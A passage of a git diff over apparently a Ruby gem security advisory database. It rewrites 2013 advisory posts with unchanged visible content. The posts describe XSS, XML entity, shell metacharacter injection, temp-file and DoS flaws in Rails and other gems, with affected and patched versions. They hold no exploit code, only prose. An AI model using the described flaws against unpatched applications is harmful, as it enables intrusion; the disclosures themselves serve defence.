+  - "~> 2.3.18"
+  - "~> 3.1.12"
+  - ">= 3.2.13"
+---
diff --git a/advisories/_posts/2013-03-19-CVE-2013-1855.md b/advisories/_posts/2013-03-19-CVE-2013-1855.md
index 4e316e84..cdc8ce8c 100644
--- a/advisories/_posts/2013-03-19-CVE-2013-1855.md
+++ b/advisories/_posts/2013-03-19-CVE-2013-1855.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2013-1855 (actionpack): CVE-2013-1855 rubygem-actionpack: css_sanitization:
-  XSS vulnerability in sanitize_css'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2013-1855
-  osvdb: 91452
-  ghsa: q759-hwvc-m3jg
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1855
-  title: 'CVE-2013-1855 rubygem-actionpack: css_sanitization: XSS vulnerability in
-    sanitize_css'
-  date: 2013-03-19
-  description: |
-    The sanitize_css method in lib/action_controller/vendor/html-scanner/html/sanitizer.rb
-    in the Action Pack component in Ruby on Rails before 2.3.18, 3.0.x and 3.1.x before
-    3.1.12, and 3.2.x before 3.2.13 does not properly handle \n (newline) characters,
-    which makes it easier for remote attackers to conduct cross-site scripting (XSS)
-    attacks via crafted Cascading Style Sheets (CSS) token sequences. A cross-site scripting
-    (XSS) flaw was found in Action Pack. A remote attacker could use this flaw to conduct
-    XSS attacks against users of an application using Action Pack.
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 2.3.18"
-  - "~> 3.1.12"
-  - ">= 3.2.13"
----
+---
+layout: advisory
+title: 'CVE-2013-1855 (actionpack): CVE-2013-1855 rubygem-actionpack: css_sanitization:
+  XSS vulnerability in sanitize_css'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2013-1855
+  osvdb: 91452
+  ghsa: q759-hwvc-m3jg
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1855
+  title: 'CVE-2013-1855 rubygem-actionpack: css_sanitization: XSS vulnerability in
+    sanitize_css'
+  date: 2013-03-19
+  description: |
+    The sanitize_css method in lib/action_controller/vendor/html-scanner/html/sanitizer.rb
+    in the Action Pack component in Ruby on Rails before 2.3.18, 3.0.x and 3.1.x before
+    3.1.12, and 3.2.x before 3.2.13 does not properly handle \n (newline) characters,
+    which makes it easier for remote attackers to conduct cross-site scripting (XSS)
+    attacks via crafted Cascading Style Sheets (CSS) token sequences. A cross-site scripting
+    (XSS) flaw was found in Action Pack. A remote attacker could use this flaw to conduct
+    XSS attacks against users of an application using Action Pack.
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 2.3.18"
+  - "~> 3.1.12"
+  - ">= 3.2.13"
+---
diff --git a/advisories/_posts/2013-03-19-CVE-2013-1856.md b/advisories/_posts/2013-03-19-CVE-2013-1856.md
index 03f4b13d..02c0c97d 100644
--- a/advisories/_posts/2013-03-19-CVE-2013-1856.md
+++ b/advisories/_posts/2013-03-19-CVE-2013-1856.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2013-1856 (activesupport): XML Parsing Vulnerability affecting JRuby users'
-comments: false
-categories:
-- activesupport
-- rails
-- jruby
-advisory:
-  gem: activesupport
-  framework: rails
-  platform: jruby
-  cve: 2013-1856
-  osvdb: 91451
-  ghsa: 9c2j-593q-3g82
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1856
-  title: XML Parsing Vulnerability affecting JRuby users
-  date: 2013-03-19
-  description: |
-    The ActiveSupport XML parsing functionality supports multiple
-    pluggable backends. One backend supported for JRuby users is
-    ActiveSupport::XmlMini_JDOM which makes use of the
-    javax.xml.parsers.DocumentBuilder class. In some JVM configurations
-    the default settings of that class can allow an attacker to construct
-    XML which, when parsed, will contain the contents of arbitrary URLs
-    including files from the application server. They may also allow for
-    various denial of service attacks. Action Pack
-  cvss_v2: 7.8
-  unaffected_versions:
-  - "~> 2.3.0"
-  patched_versions:
-  - "~> 3.1.12"
-  - ">= 3.2.13"
----
+---
+layout: advisory
+title: 'CVE-2013-1856 (activesupport): XML Parsing Vulnerability affecting JRuby users'
+comments: false
+categories:
+- activesupport
+- rails
+- jruby
+advisory:
+  gem: activesupport
+  framework: rails
+  platform: jruby
+  cve: 2013-1856
+  osvdb: 91451
+  ghsa: 9c2j-593q-3g82
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1856
+  title: XML Parsing Vulnerability affecting JRuby users
+  date: 2013-03-19
+  description: |
+    The ActiveSupport XML parsing functionality supports multiple
+    pluggable backends. One backend supported for JRuby users is
+    ActiveSupport::XmlMini_JDOM which makes use of the
+    javax.xml.parsers.DocumentBuilder class. In some JVM configurations
+    the default settings of that class can allow an attacker to construct
+    XML which, when parsed, will contain the contents of arbitrary URLs
+    including files from the application server. They may also allow for
+    various denial of service attacks. Action Pack
+  cvss_v2: 7.8
+  unaffected_versions:
+  - "~> 2.3.0"
+  patched_versions:
+  - "~> 3.1.12"
+  - ">= 3.2.13"
+---
diff --git a/advisories/_posts/2013-03-19-CVE-2013-1857.md b/advisories/_posts/2013-03-19-CVE-2013-1857.md
index 82abe151..3ac68453 100644
--- a/advisories/_posts/2013-03-19-CVE-2013-1857.md
+++ b/advisories/_posts/2013-03-19-CVE-2013-1857.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2013-1857 (actionpack): CVE-2013-1857 rubygem-actionpack: sanitize_protocol:
-  XSS Vulnerability in the  helper of Ruby on Rails'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2013-1857
-  osvdb: 91454
-  ghsa: j838-vfpq-fmf2
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1857
-  title: 'CVE-2013-1857 rubygem-actionpack: sanitize_protocol: XSS Vulnerability in
-    the  helper of Ruby on Rails'
-  date: 2013-03-19
-  description: |
-    'The sanitize helper in lib/action_controller/vendor/html-scanner/html/sanitizer.rb
-    in the Action Pack component in Ruby on Rails before 2.3.18, 3.0.x and 3.1.x before
-    3.1.12, and 3.2.x before 3.2.13 does not properly handle encoded : (colon) characters
-    in URLs, which makes it easier for remote attackers to conduct cross-site scripting
-    (XSS) attacks via a crafted scheme name, as demonstrated by including a &#x3a; sequence.
-    A cross-site scripting (XSS) flaw was found in Action Pack. A remote attacker could
-    use this flaw to conduct XSS attacks against users of an application using Action
-    Pack.'
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 2.3.18"
-  - "~> 3.1.12"
-  - ">= 3.2.13"
----
+---
+layout: advisory
+title: 'CVE-2013-1857 (actionpack): CVE-2013-1857 rubygem-actionpack: sanitize_protocol:
+  XSS Vulnerability in the  helper of Ruby on Rails'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2013-1857
+  osvdb: 91454
+  ghsa: j838-vfpq-fmf2
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1857
+  title: 'CVE-2013-1857 rubygem-actionpack: sanitize_protocol: XSS Vulnerability in
+    the  helper of Ruby on Rails'
+  date: 2013-03-19
+  description: |
+    'The sanitize helper in lib/action_controller/vendor/html-scanner/html/sanitizer.rb
+    in the Action Pack component in Ruby on Rails before 2.3.18, 3.0.x and 3.1.x before
+    3.1.12, and 3.2.x before 3.2.13 does not properly handle encoded : (colon) characters
+    in URLs, which makes it easier for remote attackers to conduct cross-site scripting
+    (XSS) attacks via a crafted scheme name, as demonstrated by including a &#x3a; sequence.
+    A cross-site scripting (XSS) flaw was found in Action Pack. A remote attacker could
+    use this flaw to conduct XSS attacks against users of an application using Action
+    Pack.'
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 2.3.18"
+  - "~> 3.1.12"
+  - ">= 3.2.13"
+---
diff --git a/advisories/_posts/2013-03-26-CVE-2013-1898.md b/advisories/_posts/2013-03-26-CVE-2013-1898.md
index aa198318..006e1dc9 100644
--- a/advisories/_posts/2013-03-26-CVE-2013-1898.md
+++ b/advisories/_posts/2013-03-26-CVE-2013-1898.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2013-1898 (thumbshooter): Thumbshooter Gem for Ruby thumbshooter.rb URL
-  Shell Metacharacter Injection Arbitrary Command Execution'
-comments: false
-categories:
-- thumbshooter
-advisory:
-  gem: thumbshooter
-  cve: 2013-1898
-  osvdb: 91839
-  ghsa: 7fqj-cg79-f2pv
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1898
-  title: Thumbshooter Gem for Ruby thumbshooter.rb URL Shell Metacharacter Injection
-    Arbitrary Command Execution
-  date: 2013-03-26
-  description: |
-    Thumbshooter Gem for Ruby contains a flaw that is due to the program
-    failing to properly sanitize input passed to thumbshooter.rb. With a specially crafted
-    URL that contains shell metacharacters, a context-dependent attacker can execute
-    arbitrary commands.
-  cvss_v2: 7.5
----
+---
+layout: advisory
+title: 'CVE-2013-1898 (thumbshooter): Thumbshooter Gem for Ruby thumbshooter.rb URL
+  Shell Metacharacter Injection Arbitrary Command Execution'
+comments: false
+categories:
+- thumbshooter
+advisory:
+  gem: thumbshooter
+  cve: 2013-1898
+  osvdb: 91839
+  ghsa: 7fqj-cg79-f2pv
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1898
+  title: Thumbshooter Gem for Ruby thumbshooter.rb URL Shell Metacharacter Injection
+    Arbitrary Command Execution
+  date: 2013-03-26
+  description: |
+    Thumbshooter Gem for Ruby contains a flaw that is due to the program
+    failing to properly sanitize input passed to thumbshooter.rb. With a specially crafted
+    URL that contains shell metacharacters, a context-dependent attacker can execute
+    arbitrary commands.
+  cvss_v2: 7.5
+---
diff --git a/advisories/_posts/2013-04-01-CVE-2013-1911.md b/advisories/_posts/2013-04-01-CVE-2013-1911.md
index 6ff4038b..0e07fb1e 100644
--- a/advisories/_posts/2013-04-01-CVE-2013-1911.md
+++ b/advisories/_posts/2013-04-01-CVE-2013-1911.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2013-1911 (ldoce): ldoce Gem for Ruby MP3 URL Shell Metacharacter Injection
-  Arbitrary Command Execution'
-comments: false
-categories:
-- ldoce
-advisory:
-  gem: ldoce
-  cve: 2013-1911
-  osvdb: 91870
-  ghsa: g266-3crh-h7gj
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1911
-  title: ldoce Gem for Ruby MP3 URL Shell Metacharacter Injection Arbitrary Command
-    Execution
-  date: 2013-04-01
-  description: |
-    ldoce Gem for Ruby contains a flaw that is triggered during the handling
-    of a specially crafted URL or filename for MP3 files that have shell metacharacters
-    injected in to it. This may allow a context-dependent attacker to execute arbitrary
-    commands.
-  cvss_v2: 6.8
----
+---
+layout: advisory
+title: 'CVE-2013-1911 (ldoce): ldoce Gem for Ruby MP3 URL Shell Metacharacter Injection
+  Arbitrary Command Execution'
+comments: false
+categories:
+- ldoce
+advisory:
+  gem: ldoce
+  cve: 2013-1911
+  osvdb: 91870
+  ghsa: g266-3crh-h7gj
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1911
+  title: ldoce Gem for Ruby MP3 URL Shell Metacharacter Injection Arbitrary Command
+    Execution
+  date: 2013-04-01
+  description: |
+    ldoce Gem for Ruby contains a flaw that is triggered during the handling
+    of a specially crafted URL or filename for MP3 files that have shell metacharacters
+    injected in to it. This may allow a context-dependent attacker to execute arbitrary
+    commands.
+  cvss_v2: 6.8
+---
diff --git a/advisories/_posts/2013-04-04-CVE-2013-1947.md b/advisories/_posts/2013-04-04-CVE-2013-1947.md
index c251c682..88457bf1 100644
--- a/advisories/_posts/2013-04-04-CVE-2013-1947.md
+++ b/advisories/_posts/2013-04-04-CVE-2013-1947.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2013-1947 (kelredd-pruview): kelredd-pruview Gem for Ruby /lib/pruview/document.rb
-  File Name Shell Metacharacter Injection Arbitrary Command Execution'
-comments: false
-categories:
-- kelredd-pruview
-advisory:
-  gem: kelredd-pruview
-  cve: 2013-1947
-  osvdb: 92228
-  ghsa: 78j3-7wpm-qhvp
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1947
-  title: kelredd-pruview Gem for Ruby /lib/pruview/document.rb File Name Shell Metacharacter
-    Injection Arbitrary Command Execution
-  date: 2013-04-04
-  description: |
-    kelredd-pruview Gem for Ruby contains a flaw in /lib/pruview/document.rb.
-    The issue is triggered during the handling of a specially crafted file name that
-    contains injected shell metacharacters. This may allow a context-dependent attacker
-    to potentially execute arbitrary commands.
-  cvss_v2: 9.3
----
+---
+layout: advisory
+title: 'CVE-2013-1947 (kelredd-pruview): kelredd-pruview Gem for Ruby /lib/pruview/document.rb
+  File Name Shell Metacharacter Injection Arbitrary Command Execution'
+comments: false
+categories:
+- kelredd-pruview
+advisory:
+  gem: kelredd-pruview
+  cve: 2013-1947
+  osvdb: 92228
+  ghsa: 78j3-7wpm-qhvp
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1947
+  title: kelredd-pruview Gem for Ruby /lib/pruview/document.rb File Name Shell Metacharacter
+    Injection Arbitrary Command Execution
+  date: 2013-04-04
+  description: |
+    kelredd-pruview Gem for Ruby contains a flaw in /lib/pruview/document.rb.
+    The issue is triggered during the handling of a specially crafted file name that
+    contains injected shell metacharacters. This may allow a context-dependent attacker
+    to potentially execute arbitrary commands.
+  cvss_v2: 9.3
+---
diff --git a/advisories/_posts/2013-04-08-CVE-2013-1933.md b/advisories/_posts/2013-04-08-CVE-2013-1933.md
index caf7e665..805d0690 100644
--- a/advisories/_posts/2013-04-08-CVE-2013-1933.md
+++ b/advisories/_posts/2013-04-08-CVE-2013-1933.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2013-1933 (karteek-docsplit): Karteek Docsplit Gem for Ruby text_extractor.rb
-  File Name Shell Metacharacter Injection Arbitrary Command Execution'
-comments: false
-categories:
-- karteek-docsplit
-advisory:
-  gem: karteek-docsplit
-  cve: 2013-1933
-  osvdb: 92117
-  ghsa: 4fvg-pwv7-v54g
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1933
-  title: Karteek Docsplit Gem for Ruby text_extractor.rb File Name Shell Metacharacter
-    Injection Arbitrary Command Execution
-  date: 2013-04-08
-  description: |
-    Karteek Docsplit Gem for Ruby contains a flaw that is due to the program
-    failing to properly sanitize input passed to text_extractor.rb. With a specially
-    crafted file name that contains shell metacharacters, a context-dependent attacker
-    can execute arbitrary commands
-  cvss_v2: 9.3
----
+---
+layout: advisory
+title: 'CVE-2013-1933 (karteek-docsplit): Karteek Docsplit Gem for Ruby text_extractor.rb
+  File Name Shell Metacharacter Injection Arbitrary Command Execution'
+comments: false
+categories:
+- karteek-docsplit
+advisory:
+  gem: karteek-docsplit
+  cve: 2013-1933
+  osvdb: 92117
+  ghsa: 4fvg-pwv7-v54g
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1933
+  title: Karteek Docsplit Gem for Ruby text_extractor.rb File Name Shell Metacharacter
+    Injection Arbitrary Command Execution
+  date: 2013-04-08
+  description: |
+    Karteek Docsplit Gem for Ruby contains a flaw that is due to the program
+    failing to properly sanitize input passed to text_extractor.rb. With a specially
+    crafted file name that contains shell metacharacters, a context-dependent attacker
+    can execute arbitrary commands
+  cvss_v2: 9.3
+---
diff --git a/advisories/_posts/2013-04-13-CVE-2013-1948.md b/advisories/_posts/2013-04-13-CVE-2013-1948.md
index 450fe12a..c713ea5c 100644
--- a/advisories/_posts/2013-04-13-CVE-2013-1948.md
+++ b/advisories/_posts/2013-04-13-CVE-2013-1948.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2013-1948 (md2pdf): md2pdf Gem for Ruby md2pdf/converter.rb File Name
-  Shell Metacharacter Injection Arbitrary Command Execution'
-comments: false
-categories:
-- md2pdf
-advisory:
-  gem: md2pdf
-  cve: 2013-1948
-  osvdb: 92290
-  ghsa: 99ch-8mvp-g7m5
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1948
-  title: md2pdf Gem for Ruby md2pdf/converter.rb File Name Shell Metacharacter Injection
-    Arbitrary Command Execution
-  date: 2013-04-13
-  description: |
-    md2pdf Gem for Ruby contains a flaw that is due to the program failing
-    to properly sanitize input passed to md2pdf/converter.rb. With a specially crafted
-    file name that contains shell metacharacters, a context-dependent attacker can execute
-    arbitrary commands
-  cvss_v2: 10.0
----
+---
+layout: advisory
+title: 'CVE-2013-1948 (md2pdf): md2pdf Gem for Ruby md2pdf/converter.rb File Name
+  Shell Metacharacter Injection Arbitrary Command Execution'
+comments: false
+categories:
+- md2pdf
+advisory:
+  gem: md2pdf
+  cve: 2013-1948
+  osvdb: 92290
+  ghsa: 99ch-8mvp-g7m5
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-1948
+  title: md2pdf Gem for Ruby md2pdf/converter.rb File Name Shell Metacharacter Injection
+    Arbitrary Command Execution
+  date: 2013-04-13
+  description: |
+    md2pdf Gem for Ruby contains a flaw that is due to the program failing
+    to properly sanitize input passed to md2pdf/converter.rb. With a specially crafted
+    file name that contains shell metacharacters, a context-dependent attacker can execute
+    arbitrary commands
+  cvss_v2: 10.0
+---
diff --git a/advisories/_posts/2013-04-21-CVE-2013-3221.md b/advisories/_posts/2013-04-21-CVE-2013-3221.md
index fbdbcc2d..46b98df2 100644
--- a/advisories/_posts/2013-04-21-CVE-2013-3221.md
+++ b/advisories/_posts/2013-04-21-CVE-2013-3221.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'CVE-2013-3221 (activerecord): Data-type injection vulnerability'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2013-3221
-  ghsa: f57c-hx33-hvh8
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-3221
-  title: Data-type injection vulnerability
-  date: 2013-04-21
-  description: |
-    The Active Record component in Ruby on Rails 2.3.x, 3.0.x, 3.1.x,
-    and 3.2.x does not ensure that the declared data type of a database
-    column is used during comparisons of input values to stored values
-    in that column, which makes it easier for remote attackers to
-    conduct data-type injection attacks against Ruby on Rails applications
-    via a crafted value, as demonstrated by unintended interaction
-    between the "typed XML" feature and a MySQL database.
-
-    ## RELEASE INFO
-    - Phrack writeup says that 'couple of days after the advisory the
-      issue was "fixed" in Rails 3.2.12 as by the following commit' 921a296.
-      But "Indeed the vector is completely fixed as of Rails 4.2 almost
-      two years after the original advisory."
-  cvss_v2: 6.4
-  patched_versions:
-  - ">= 4.2.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2013-3221
-    - https://github.com/rails/rails/commit/c9909db9f2f81575ef2ea2ed3b4e8743c8d6f1b9
-    - https://github.com/rails/rails/commit/921a296a3390192a71abeec6d9a035cc6d1865c8
-    - https://groups.google.com/group/rubyonrails-security/msg/1f3bc0b88a60c1ce
-    - http://pl.reddit.com/r/netsec/comments/17yajp/mysql_madness_and_rails
-    - http://openwall.com/lists/oss-security/2013/02/06/7
-    - http://openwall.com/lists/oss-security/2013/04/24/7
-    - https://gist.github.com/marianposaceanu/5442275
-    - https://web.archive.org/web/20160307143147/http://www.phenoelit.org/blog/archives/2013/02/index.html
-    - https://github.com/advisories/GHSA-f57c-hx33-hvh8
-    - https://phrack.org/issues/69/12
----
+---
+layout: advisory
+title: 'CVE-2013-3221 (activerecord): Data-type injection vulnerability'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2013-3221
+  ghsa: f57c-hx33-hvh8
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-3221
+  title: Data-type injection vulnerability
+  date: 2013-04-21
+  description: |
+    The Active Record component in Ruby on Rails 2.3.x, 3.0.x, 3.1.x,
+    and 3.2.x does not ensure that the declared data type of a database
+    column is used during comparisons of input values to stored values
+    in that column, which makes it easier for remote attackers to
+    conduct data-type injection attacks against Ruby on Rails applications
+    via a crafted value, as demonstrated by unintended interaction
+    between the "typed XML" feature and a MySQL database.
+
+    ## RELEASE INFO
+    - Phrack writeup says that 'couple of days after the advisory the
+      issue was "fixed" in Rails 3.2.12 as by the following commit' 921a296.
+      But "Indeed the vector is completely fixed as of Rails 4.2 almost
+      two years after the original advisory."
+  cvss_v2: 6.4
+  patched_versions:
+  - ">= 4.2.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2013-3221
+    - https://github.com/rails/rails/commit/c9909db9f2f81575ef2ea2ed3b4e8743c8d6f1b9
+    - https://github.com/rails/rails/commit/921a296a3390192a71abeec6d9a035cc6d1865c8
+    - https://groups.google.com/group/rubyonrails-security/msg/1f3bc0b88a60c1ce
+    - http://pl.reddit.com/r/netsec/comments/17yajp/mysql_madness_and_rails
+    - http://openwall.com/lists/oss-security/2013/02/06/7
+    - http://openwall.com/lists/oss-security/2013/04/24/7
+    - https://gist.github.com/marianposaceanu/5442275
+    - https://web.archive.org/web/20160307143147/http://www.phenoelit.org/blog/archives/2013/02/index.html
+    - https://github.com/advisories/GHSA-f57c-hx33-hvh8
+    - https://phrack.org/issues/69/12
+---
diff --git a/advisories/_posts/2013-05-14-CVE-2013-2090.md b/advisories/_posts/2013-05-14-CVE-2013-2090.md
index 6dc514c6..a47f44f5 100644
--- a/advisories/_posts/2013-05-14-CVE-2013-2090.md
+++ b/advisories/_posts/2013-05-14-CVE-2013-2090.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2013-2090 (cremefraiche): Creme Fraiche Gem for Ruby File Name Shell Metacharacter
-  Injection Arbitrary Command Execution'
-comments: false
-categories:
-- cremefraiche
-advisory:
-  gem: cremefraiche
-  cve: 2013-2090
-  osvdb: 93395
-  ghsa: m6f7-46hw-grcj
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-2090
-  title: Creme Fraiche Gem for Ruby File Name Shell Metacharacter Injection Arbitrary
-    Command Execution
-  date: 2013-05-14
-  description: |
-    Creme Fraiche Gem for Ruby contains a flaw that is due to the program
-    failing to properly sanitize input in file names. With a specially crafted file
-    name that contains shell metacharacters, a context-dependent attacker can execute
-    arbitrary commands
-  cvss_v2: 9.3
-  patched_versions:
-  - ">= 0.6.1"
----
+---
+layout: advisory
+title: 'CVE-2013-2090 (cremefraiche): Creme Fraiche Gem for Ruby File Name Shell Metacharacter
+  Injection Arbitrary Command Execution'
+comments: false
+categories:
+- cremefraiche
+advisory:
+  gem: cremefraiche
+  cve: 2013-2090
+  osvdb: 93395
+  ghsa: m6f7-46hw-grcj
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-2090
+  title: Creme Fraiche Gem for Ruby File Name Shell Metacharacter Injection Arbitrary
+    Command Execution
+  date: 2013-05-14
+  description: |
+    Creme Fraiche Gem for Ruby contains a flaw that is due to the program
+    failing to properly sanitize input in file names. With a specially crafted file
+    name that contains shell metacharacters, a context-dependent attacker can execute
+    arbitrary commands
+  cvss_v2: 9.3
+  patched_versions:
+  - ">= 0.6.1"
+---
diff --git a/advisories/_posts/2013-05-17-CVE-2013-2105.md b/advisories/_posts/2013-05-17-CVE-2013-2105.md
index 40bf3775..b9caf601 100644
--- a/advisories/_posts/2013-05-17-CVE-2013-2105.md
+++ b/advisories/_posts/2013-05-17-CVE-2013-2105.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2013-2105 (show_in_browser): Show In Browser Gem for Ruby /tmp/browser.html
-  Arbitrary Script Injection'
-comments: false
-categories:
-- show_in_browser
-advisory:
-  gem: show_in_browser
-  cve: 2013-2105
-  osvdb: 93490
-  ghsa: 9hx9-w2j6-rw76
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-2105
-  title: Show In Browser Gem for Ruby /tmp/browser.html Arbitrary Script Injection
-  date: 2013-05-17
-  description: |
-    Show In Browser Gem for Ruby contains a flaw that is triggered when the
-    application does not validate input passed via the /tmp/browser.html file. This
-    may allow a local attacker to create a specially crafted request that would execute
-    arbitrary script code in a user's browser.
----
+---
+layout: advisory
+title: 'CVE-2013-2105 (show_in_browser): Show In Browser Gem for Ruby /tmp/browser.html
+  Arbitrary Script Injection'
+comments: false
+categories:
+- show_in_browser
+advisory:
+  gem: show_in_browser
+  cve: 2013-2105
+  osvdb: 93490
+  ghsa: 9hx9-w2j6-rw76
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-2105
+  title: Show In Browser Gem for Ruby /tmp/browser.html Arbitrary Script Injection
+  date: 2013-05-17
+  description: |
+    Show In Browser Gem for Ruby contains a flaw that is triggered when the
+    application does not validate input passed via the /tmp/browser.html file. This
+    may allow a local attacker to create a specially crafted request that would execute
+    arbitrary script code in a user's browser.
+---
diff --git a/advisories/_posts/2013-05-29-CVE-2013-2119.md b/advisories/_posts/2013-05-29-CVE-2013-2119.md
index 1bf5f5f8..73226aa8 100644
--- a/advisories/_posts/2013-05-29-CVE-2013-2119.md
+++ b/advisories/_posts/2013-05-29-CVE-2013-2119.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2013-2119 (passenger): CVE-2013-2119 rubygem-passenger: incorrect temporary
-  file usage'
-comments: false
-categories:
-- passenger
-advisory:
-  gem: passenger
-  cve: 2013-2119
-  osvdb: 93752
-  ghsa: 9qj7-jvg4-qr2x
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-2119
-  title: 'CVE-2013-2119 rubygem-passenger: incorrect temporary file usage'
-  date: 2013-05-29
-  description: |
-    Phusion Passenger gem before 3.0.21 and 4.0.x before 4.0.5 for Ruby allows
-    local users to cause a denial of service (prevent application start) or gain privileges
-    by pre-creating a temporary "config" file in a directory with a predictable name
-    in /tmp/ before it is used by the gem.
-  cvss_v2: 4.6
-  patched_versions:
-  - "~> 3.0.21"
-  - ">= 4.0.5"
----
+---
+layout: advisory
+title: 'CVE-2013-2119 (passenger): CVE-2013-2119 rubygem-passenger: incorrect temporary
+  file usage'
+comments: false
+categories:
+- passenger
+advisory:
+  gem: passenger
+  cve: 2013-2119
+  osvdb: 93752
+  ghsa: 9qj7-jvg4-qr2x
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-2119
+  title: 'CVE-2013-2119 rubygem-passenger: incorrect temporary file usage'
+  date: 2013-05-29
+  description: |
+    Phusion Passenger gem before 3.0.21 and 4.0.x before 4.0.5 for Ruby allows
+    local users to cause a denial of service (prevent application start) or gain privileges
+    by pre-creating a temporary "config" file in a directory with a predictable name
+    in /tmp/ before it is used by the gem.
+  cvss_v2: 4.6
+  patched_versions:
+  - "~> 3.0.21"
+  - ">= 4.0.5"
+---
diff --git a/advisories/_posts/2013-06-10-CVE-2013-4136.md b/advisories/_posts/2013-06-10-CVE-2013-4136.md
index 20a20898..6785ada1 100644
--- a/advisories/_posts/2013-06-10-CVE-2013-4136.md
+++ b/advisories/_posts/2013-06-10-CVE-2013-4136.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2013-4136 (passenger): CVE-2013-4136 rubygem-passenger: insecure temporary
-  directory usage due toreuse of existing server instance directories'
-comments: false
-categories:
-- passenger
-advisory:
-  gem: passenger
-  cve: 2013-4136
-  osvdb: 94074
-  ghsa: w6rc-q387-vpgq
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-4136
-  title: 'CVE-2013-4136 rubygem-passenger: insecure temporary directory usage due
-    toreuse of existing server instance directories'
-  date: 2013-06-10
-  description: |
-    ext/common/ServerInstanceDir.h in Phusion Passenger gem before 4.0.6
-    for Ruby allows local users to gain privileges or possibly change the ownership
-    of arbitrary directories via a symlink attack on a directory with a predictable
-    name in /tmp/.
-  cvss_v2: 4.6
-  patched_versions:
-  - ">= 4.0.8"
----
+---
+layout: advisory
+title: 'CVE-2013-4136 (passenger): CVE-2013-4136 rubygem-passenger: insecure temporary
+  directory usage due toreuse of existing server instance directories'
+comments: false
+categories:
+- passenger
+advisory:
+  gem: passenger
+  cve: 2013-4136
+  osvdb: 94074
+  ghsa: w6rc-q387-vpgq
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-4136
+  title: 'CVE-2013-4136 rubygem-passenger: insecure temporary directory usage due
+    toreuse of existing server instance directories'
+  date: 2013-06-10
+  description: |
+    ext/common/ServerInstanceDir.h in Phusion Passenger gem before 4.0.6
+    for Ruby allows local users to gain privileges or possibly change the ownership
+    of arbitrary directories via a symlink attack on a directory with a predictable
+    name in /tmp/.
+  cvss_v2: 4.6
+  patched_versions:
+  - ">= 4.0.8"
+---
diff --git a/advisories/_posts/2013-06-26-OSVDB-94679.md b/advisories/_posts/2013-06-26-OSVDB-94679.md
index 15a5a88c..ea7e0780 100644
--- a/advisories/_posts/2013-06-26-OSVDB-94679.md
+++ b/advisories/_posts/2013-06-26-OSVDB-94679.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'OSVDB-94679 (enum_column3): enum_column3 Gem for Ruby Symbol Creation Remote
-  DoS'
-comments: false
-categories:
-- enum_column3
-advisory:
-  gem: enum_column3
-  osvdb: 94679
-  url: https://security.snyk.io/vuln/SNYK-RUBY-ENUMCOLUMN3-20100
-  title: enum_column3 Gem for Ruby Symbol Creation Remote DoS
-  date: 2013-06-26
-  description: |
-    The enum_column3 Gem for Ruby contains a flaw that may allow a remote
-    denial of service. The issue is due to the program typecasting unexpected
-    strings to symbols. This may allow a remote attacker to crash the program.
-  related:
-    url:
-    - https://security.snyk.io/vuln/SNYK-RUBY-ENUMCOLUMN3-20100
-    - http://osvdb.org/show/osvdb/94679
-  notes: Never patched
----
+---
+layout: advisory
+title: 'OSVDB-94679 (enum_column3): enum_column3 Gem for Ruby Symbol Creation Remote
+  DoS'
+comments: false
+categories:
+- enum_column3
+advisory:
+  gem: enum_column3
